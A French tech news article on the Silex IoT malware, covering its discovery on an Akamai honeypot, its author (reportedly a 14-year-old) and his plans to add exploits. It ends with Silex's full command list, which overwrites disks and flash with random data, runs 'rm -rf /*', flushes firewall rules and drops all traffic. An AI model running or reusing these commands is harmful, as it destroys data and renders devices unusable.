Larry Cashdollar de l'équipe Akamai Security Intelligence Response Team (SIRT) a été le premier à découvrir Silex. Le malware a frappé son honeypot en essayant des informations d'identification par défaut sur une connexion telnet.
Le chercheur affirme que Silex supprime le système infecté en écrivant des données aléatoires à partir de '/ dev / random' sur tous les lecteurs de stockage détectés.
« En examinant les échantillons binaires collectés dans mon pot-de-miel, je vois que Silexbot appelle fdisk -l qui va alors répertorier toutes les partitions du disque. À l'aide de cette liste, Silexbot écrit ensuite des données aléatoires de / dev / random sur l'une des partitions qu'il découvre », a-t-il expliqué dans un billet dans lequel il a livré son une analyse.
Silex exécute certaines commandes néfastes qui suppriment les configurations réseau, effacent les règles iptables et ajoutent une règle qui supprime toutes les connexions avant de redémarrer le périphérique.
Ces instructions rendent l'appareil affecté inutilisable. Pour retrouver l’usage de leurs appareils, les victimes doivent réinstaller manuellement le micrologiciel du périphérique, une tâche parfois trop compliquée pour la majorité des propriétaires de périphériques. Il n’est pas exclu que certains propriétaires jettent leurs appareils, pensant avoir eu une panne matérielle sans savoir qu'ils ont été touchés par des logiciels malveillants.
Cashdollar a examiné les fichiers binaires des systèmes ARM, mais une version du shell Bash était également disponible au téléchargement, de sorte que toute architecture de type UNIX aurait pu être une cible.
Une équipe de trois personnes dont un adolescent de 14 ans
Selon le chercheur en sécurité Ankit Anubhav de NewSky, Silex a été créée par une équipe de trois personnes, le principal responsable étant un adolescent d'un pays européen utilisant les pseudonymes 'Light The Leafon' et 'Light The Sylveon'. Les deux autres membres sont "Alx" et "Skiddy".
Light The Leafon est l'auteur d'un autre bot appelé HITO, basé sur un autre programme malveillant IdO appelé Mirai. Il a rapidement développé des compétences lui permettant d'écrire son propre botnet.
Quant au but de Silex, il est conçu uniquement pour bricoler des dispositifs IdO afin d’empêcher les script kiddies de les atteindre. Autrement dit, l'auteur de programmes malveillants s'oppose à ce que les développeurs moins expérimentés puissent compromettre des systèmes non protégés et les utiliser pour gagner de l'argent.
Lors de l’exécution, Silex affiche le message suivant de l’auteur, s’excusant de cette attaque et en expliquant la raison.
Anubhav a parlé à Light de HITO il y a deux mois et a publié l'interview sur son podcast. L'auteur a déclaré lors de l'entretien qu'il avait 14 ans. Light a déclaré que le projet avait démarré comme une blague mais qu'il était maintenant devenu un projet à temps plein et qu'il avait abandonné l'ancien botnet HITO pour Silex.
L'adolescent a déclaré qu'il envisageait de développer davantage le logiciel malveillant et d'ajouter des fonctions encore plus destructrices. « La fonctionnalité originale de BrickerBot sera retravaillée », a déclaré Light à Anubhav.
Les plans incluent l’ajout de la possibilité de se connecter à des périphériques via SSH, en plus de la capacité de détournement de Telnet actuelle. De plus, Light prévoit également d'incorporer des exploits dans Silex, donnant ainsi au logiciel malveillant la possibilité d'utiliser des vulnérabilités pour pénétrer dans des appareils, de la même manière que la plupart des réseaux de botnets IoT actuels.
« Mon ami Skiddy et moi allons retravailler tout le bot », a assuré Light. « Il va cibler chaque exploit connu du public que charge Mirai ou Qbot ».
En somme, le plan initial de Silex consistait à développer un réseau de robots en intégrant de nouvelles méthodes de compromissions, telles que des exploits pour les vulnérabilités connues.
Voici les commandes Silex
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | "busybox cat /dev/urandom >/dev/mtdblock0" "busybox cat /dev/urandom >/dev/sda" "busybox cat /dev/urandom >/dev/ram0" "busybox cat /dev/urandom >/dev/mmc0" "busybox cat /dev/urandom >/dev/mtdblock10" "fdisk -C 1 -H 1 -S 1 /dev/mtd0" "fdisk -C 1 -H 1 -S 1 /dev/mtd1" "fdisk -C 1 -H 1 -S 1 /dev/sda" "fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" cat /proc/mounts cat /dev/urandom | mtd_write mtd0 - 0 32768 cat /dev/urandom | mtd_write mtd1 - 0 32768 busybox cat /dev/urandom >/dev/mtd0 & busybox cat /dev/urandom >/dev/sda & busybox cat /dev/urandom >/dev/mtd1 & busybox cat /dev/urandom >/dev/mtdblock0 & busybox cat /dev/urandom >/dev/mtdblock1 & busybox cat /dev/urandom >/dev/mtdblock2 & busybox cat /dev/urandom >/dev/mtdblock3 & busybox route del default cat /dev/urandom >/dev/mtdblock0 & cat /dev/urandom >/dev/mtdblock1 & cat /dev/urandom >/dev/mtdblock2 & cat /dev/urandom >/dev/mtdblock3 & cat /dev/urandom >/dev/mtdblock4 & cat /dev/urandom >/dev/mtdblock5 & cat /dev/urandom >/dev/mmcblk0 & cat /dev/urandom >/dev/mmcblk0p9 & cat /dev/urandom >/dev/mmcblk0p12 & cat /dev/urandom >/dev/mmcblk0p13 & cat /dev/urandom >/dev/root & cat /dev/urandom >/dev/mmcblk0p8 & cat /dev/urandom >/dev/mmcblk0p16 & route del default iproute del default ip route del default rm -rf /* 2>/dev/null & iptables -F iptables -t nat -F iptables -A INPUT -j DROP iptables -A FORWARD -j DROP halt -n -f reboot |
Voir aussi :
Les attaques de ransomware contre les entreprises ont augmenté de plus de 500% au premier trimestre, d'après un rapport de Malwarebytes
Une vulnérabilité WinRAR vieille de 19 ans mène à plus de 100 exploits de malwares, mais elle a été corrigée dans la dernière version
265 chercheurs dans le monde ont mis en commun leurs découvertes, contribuant à éliminer plus de 100 000 sites Web de distribution de malwares
Les crypto-mineurs ont encore dominé le classement des malwares ayant eu le plus d'impact, dans l'édition de janvier du Global Threat Index